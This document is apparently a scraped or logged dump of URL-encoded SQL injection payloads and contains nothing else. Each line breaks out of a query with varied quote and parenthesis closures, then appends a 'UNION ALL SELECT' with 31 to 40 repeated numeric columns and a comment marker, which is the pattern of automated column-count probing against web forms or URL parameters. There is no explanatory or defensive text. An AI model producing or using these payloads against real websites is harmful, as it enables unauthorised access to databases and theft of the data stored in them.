-8468%22%29%29%29%20UNION%20ALL%20SELECT%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%2C%206776%23%20AND%20%28%28%28%22EsoK%22%3D%22EsoK -5688%22%29%29%29%20UNION%20ALL%20SELECT%205617%2C%205617%2C%205617%2C%205617%2C%205617%2C%205617%2C%205617%2C%205617%2C%205617%2C%205617%2C%205617%2C%205617%2C%205617%2C%205617%2C%205617%2C%205617%2C%205617%2C%205617%2C%205617%2C%205617%2C%205617%2C%205617%2C%205617%2C%205617%2C%205617%2C%205617%2C%205617%2C%205617%2C%205617%2C%205617%2C%205617%2C%205617%2C%205617%2C%205617%2C%205617%2C%205617%2C%205617%23%20AND%20%28%28%28%22bUwL%22%3D%22bUwL -4320%22%29%29%29%20UNION%20ALL%20SELECT%209459%2C%209459%2C%209459%2C%209459%2C%209459%2C%209459%2C%209459%2C%209459%2C%209459%2C%209459%2C%209459%2C%209459%2C%209459%2C%209459%2C%209459%2C%209459%2C%209459%2C%209459%2C%209459%2C%209459%2C%209459%2C%209459%2C%209459%2C%209459%2C%209459%2C%209459%2C%209459%2C%209459%2C%209459%2C%209459%2C%209459%2C%209459%2C%209459%2C%209459%2C%209459%2C%209459%2C%209459%2C%209459%23%20AND%20%28%28%28%22gosX%22%3D%22gosX -9103%22%29%29%29%20UNION%20ALL%20SELECT%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%23%20AND%20%28%28%28%22zXyk%22%3D%22zXyk -3274%22%29%29%29%20UNION%20ALL%20SELECT%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%2C%208642%23%20AND%20%28%28%28%22umiO%22%3D%22umiO -7683%22%20UNION%20ALL%20SELECT%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%23%20AND%20%22ppSd%22%3D%22ppSd -3114%22%20UNION%20ALL%20SELECT%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%2C%205416%23%20AND%20%22xbdf%22%3D%22xbdf -4002%22%20UNION%20ALL%20SELECT%202455%2C%202455%2C%202455%2C%202455%2C%202455%2C%202455%2C%202455%2C%202455%2C%202455%2C%202455%2C%202455%2C%202455%2C%202455%2C%202455%2C%202455%2C%202455%2C%202455%2C%202455%2C%202455%2C%202455%2C%202455%2C%202455%2C%202455%2C%202455%2C%202455%2C%202455%2C%202455%2C%202455%2C%202455%2C%202455%2C%202455%2C%202455%2C%202455%23%20AND%20%22GFdV%22%3D%22GFdV -1351%22%20UNION%20ALL%20SELECT%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%23%20AND%20%22vUPG%22%3D%22vUPG -7576%22%20UNION%20ALL%20SELECT%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%2C%206811%23%20AND%20%22FxgC%22%3D%22FxgC -5895%22%20UNION%20ALL%20SELECT%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%23%20AND%20%22jzYs%22%3D%22jzYs -2676%22%20UNION%20ALL%20SELECT%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%23%20AND%20%22hQPC%22%3D%22hQPC -7162%22%20UNION%20ALL%20SELECT%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%23%20AND%20%22pzeD%22%3D%22pzeD -5025%22%20UNION%20ALL%20SELECT%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%2C%206623%23%20AND%20%22hzAG%22%3D%22hzAG -1300%22%20UNION%20ALL%20SELECT%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%23%20AND%20%22AnEE%22%3D%22AnEE -2381%22%29%20UNION%20ALL%20SELECT%204774%2C%204774%2C%204774%2C%204774%2C%204774%2C%204774%2C%204774%2C%204774%2C%204774%2C%204774%2C%204774%2C%204774%2C%204774%2C%204774%2C%204774%2C%204774%2C%204774%2C%204774%2C%204774%2C%204774%2C%204774%2C%204774%2C%204774%2C%204774%2C%204774%2C%204774%2C%204774%2C%204774%2C%204774%2C%204774%2C%204774%23%20AND%20%28%22lzWx%22%20LIKE%20%22lzWx -5289%22%29%20UNION%20ALL%20SELECT%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%2C%208495%23%20AND%20%28%22nnJI%22%20LIKE%20%22nnJI -5233%22%29%20UNION%20ALL%20SELECT%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%23%20AND%20%28%22Lxfd%22%20LIKE%20%22Lxfd -7895%22%29%20UNION%20ALL%20SELECT%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%23%20AND%20%28%22lzAg%22%20LIKE%20%22lzAg -3891%22%29%20UNION%20ALL%20SELECT%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%23%20AND%20%28%22WEez%22%20LIKE%20%22WEez -1843%22%29%20UNION%20ALL%20SELECT%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%2C%205531%23%20AND%20%28%22oTlC%22%20LIKE%20%22oTlC -5753%22%29%20UNION%20ALL%20SELECT%207845%2C%207845%2C%207845%2C%207845%2C%207845%2C%207845%2C%207845%2C%207845%2C%207845%2C%207845%2C%207845%2C%207845%2C%207845%2C%207845%2C%207845%2C%207845%2C%207845%2C%207845%2C%207845%2C%207845%2C%207845%2C%207845%2C%207845%2C%207845%2C%207845%2C%207845%2C%207845%2C%207845%2C%207845%2C%207845%2C%207845%2C%207845%2C%207845%2C%207845%2C%207845%2C%207845%2C%207845%23%20AND%20%28%22BDnp%22%20LIKE%20%22BDnp -3798%22%29%20UNION%20ALL%20SELECT%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%23%20AND%20%28%22UVqw%22%20LIKE%20%22UVqw -4790%22%29%20UNION%20ALL%20SELECT%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%23%20AND%20%28%22AdKn%22%20LIKE%20%22AdKn -6374%22%29%20UNION%20ALL%20SELECT%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%2C%206488%23%20AND%20%28%22Sjuq%22%20LIKE%20%22Sjuq -8084%22%29%29%20UNION%20ALL%20SELECT%204044%2C%204044%2C%204044%2C%204044%2C%204044%2C%204044%2C%204044%2C%204044%2C%204044%2C%204044%2C%204044%2C%204044%2C%204044%2C%204044%2C%204044%2C%204044%2C%204044%2C%204044%2C%204044%2C%204044%2C%204044%2C%204044%2C%204044%2C%204044%2C%204044%2C%204044%2C%204044%2C%204044%2C%204044%2C%204044%2C%204044%23%20AND%20%28%28%22lPKu%22%20LIKE%20%22lPKu -9927%22%29%29%20UNION%20ALL%20SELECT%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%23%20AND%20%28%28%22KqYZ%22%20LIKE%20%22KqYZ -5455%22%29%29%20UNION%20ALL%20SELECT%206024%2C%206024%2C%206024%2C%206024%2C%206024%2C%206024%2C%206024%2C%206024%2C%206024%2C%206024%2C%206024%2C%206024%2C%206024%2C%206024%2C%206024%2C%206024%2C%206024%2C%206024%2C%206024%2C%206024%2C%206024%2C%206024%2C%206024%2C%206024%2C%206024%2C%206024%2C%206024%2C%206024%2C%206024%2C%206024%2C%206024%2C%206024%2C%206024%23%20AND%20%28%28%22qKiz%22%20LIKE%20%22qKiz -4613%22%29%29%20UNION%20ALL%20SELECT%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%23%20AND%20%28%28%22ymHF%22%20LIKE%20%22ymHF -6550%22%29%29%20UNION%20ALL%20SELECT%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%23%20AND%20%28%28%22LsaX%22%20LIKE%20%22LsaX -2240%22%29%29%20UNION%20ALL%20SELECT%201288%2C%201288%2C%201288%2C%201288%2C%201288%2C%201288%2C%201288%2C%201288%2C%201288%2C%201288%2C%201288%2C%201288%2C%201288%2C%201288%2C%201288%2C%201288%2C%201288%2C%201288%2C%201288%2C%201288%2C%201288%2C%201288%2C%201288%2C%201288%2C%201288%2C%201288%2C%201288%2C%201288%2C%201288%2C%201288%2C%201288%2C%201288%2C%201288%2C%201288%2C%201288%2C%201288%23%20AND%20%28%28%22slTF%22%20LIKE%20%22slTF -2382%22%29%29%20UNION%20ALL%20SELECT%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%2C%209219%23%20AND%20%28%28%22bvRg%22%20LIKE%20%22bvRg -9902%22%29%29%20UNION%20ALL%20SELECT%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%23%20AND%20%28%28%22ELxC%22%20LIKE%20%22ELxC -9340%22%29%29%20UNION%20ALL%20SELECT%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%2C%203853%23%20AND%20%28%28%22lrYs%22%20LIKE%20%22lrYs -2754%22%29%29%20UNION%20ALL%20SELECT%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%23%20AND%20%28%28%22LYvJ%22%20LIKE%20%22LYvJ -8518%22%29%29%29%20UNION%20ALL%20SELECT%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%23%20AND%20%28%28%28%22jlkS%22%20LIKE%20%22jlkS -7205%22%29%29%29%20UNION%20ALL%20SELECT%205208%2C%205208%2C%205208%2C%205208%2C%205208%2C%205208%2C%205208%2C%205208%2C%205208%2C%205208%2C%205208%2C%205208%2C%205208%2C%205208%2C%205208%2C%205208%2C%205208%2C%205208%2C%205208%2C%205208%2C%205208%2C%205208%2C%205208%2C%205208%2C%205208%2C%205208%2C%205208%2C%205208%2C%205208%2C%205208%2C%205208%2C%205208%23%20AND%20%28%28%28%22AePh%22%20LIKE%20%22AePh -1437%22%29%29%29%20UNION%20ALL%20SELECT%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%23%20AND%20%28%28%28%22Zxva%22%20LIKE%20%22Zxva -8072%22%29%29%29%20UNION%20ALL%20SELECT%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%23%20AND%20%28%28%28%22xFzX%22%20LIKE%20%22xFzX -8832%22%29%29%29%20UNION%20ALL%20SELECT%208883%2C%208883%2C%208883%2C%208883%2C%208883%2C%208883%2C%208883%2C%208883%2C%208883%2C%208883%2C%208883%2C%208883%2C%208883%2C%208883%2C%208883%2C%208883%2C%208883%2C%208883%2C%208883%2C%208883%2C%208883%2C%208883%2C%208883%2C%208883%2C%208883%2C%208883%2C%208883%2C%208883%2C%208883%2C%208883%2C%208883%2C%208883%2C%208883%2C%208883%2C%208883%23%20AND%20%28%28%28%22JhZw%22%20LIKE%20%22JhZw -3158%22%29%29%29%20UNION%20ALL%20SELECT%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%23%20AND%20%28%28%28%22DjKf%22%20LIKE%20%22DjKf -8224%22%29%29%29%20UNION%20ALL%20SELECT%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%23%20AND%20%28%28%28%22dPwb%22%20LIKE%20%22dPwb -6935%22%29%29%29%20UNION%20ALL%20SELECT%209042%2C%209042%2C%209042%2C%209042%2C%209042%2C%209042%2C%209042%2C%209042%2C%209042%2C%209042%2C%209042%2C%209042%2C%209042%2C%209042%2C%209042%2C%209042%2C%209042%2C%209042%2C%209042%2C%209042%2C%209042%2C%209042%2C%209042%2C%209042%2C%209042%2C%209042%2C%209042%2C%209042%2C%209042%2C%209042%2C%209042%2C%209042%2C%209042%2C%209042%2C%209042%2C%209042%2C%209042%2C%209042%23%20AND%20%28%28%28%22whhu%22%20LIKE%20%22whhu -3169%22%29%29%29%20UNION%20ALL%20SELECT%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%23%20AND%20%28%28%28%22MsNg%22%20LIKE%20%22MsNg -8619%22%29%29%29%20UNION%20ALL%20SELECT%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%23%20AND%20%28%28%28%22YVgf%22%20LIKE%20%22YVgf -6654%22%20UNION%20ALL%20SELECT%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%2C%209385%23%20AND%20%22KLyM%22%20LIKE%20%22KLyM -4450%22%20UNION%20ALL%20SELECT%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%2C%205687%23%20AND%20%22Rdjf%22%20LIKE%20%22Rdjf -6644%22%20UNION%20ALL%20SELECT%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%23%20AND%20%22pWWI%22%20LIKE%20%22pWWI -5899%22%20UNION%20ALL%20SELECT%206073%2C%206073%2C%206073%2C%206073%2C%206073%2C%206073%2C%206073%2C%206073%2C%206073%2C%206073%2C%206073%2C%206073%2C%206073%2C%206073%2C%206073%2C%206073%2C%206073%2C%206073%2C%206073%2C%206073%2C%206073%2C%206073%2C%206073%2C%206073%2C%206073%2C%206073%2C%206073%2C%206073%2C%206073%2C%206073%2C%206073%2C%206073%2C%206073%2C%206073%23%20AND%20%22qqZE%22%20LIKE%20%22qqZE -1805%22%20UNION%20ALL%20SELECT%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%23%20AND%20%22wznd%22%20LIKE%20%22wznd -6852%22%20UNION%20ALL%20SELECT%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%23%20AND%20%22cjWF%22%20LIKE%20%22cjWF -9295%22%20UNION%20ALL%20SELECT%203208%2C%203208%2C%203208%2C%203208%2C%203208%2C%203208%2C%203208%2C%203208%2C%203208%2C%203208%2C%203208%2C%203208%2C%203208%2C%203208%2C%203208%2C%203208%2C%203208%2C%203208%2C%203208%2C%203208%2C%203208%2C%203208%2C%203208%2C%203208%2C%203208%2C%203208%2C%203208%2C%203208%2C%203208%2C%203208%2C%203208%2C%203208%2C%203208%2C%203208%2C%203208%2C%203208%2C%203208%23%20AND%20%22BGJl%22%20LIKE%20%22BGJl -4101%22%20UNION%20ALL%20SELECT%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%2C%209029%23%20AND%20%22gfdm%22%20LIKE%20%22gfdm -4925%22%20UNION%20ALL%20SELECT%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%23%20AND%20%22KVOg%22%20LIKE%20%22KVOg -9909%22%20UNION%20ALL%20SELECT%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%2C%206989%23%20AND%20%22ivtp%22%20LIKE%20%22ivtp -7246%29%20WHERE%203428%3D3428%20UNION%20ALL%20SELECT%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%2C%203428%23 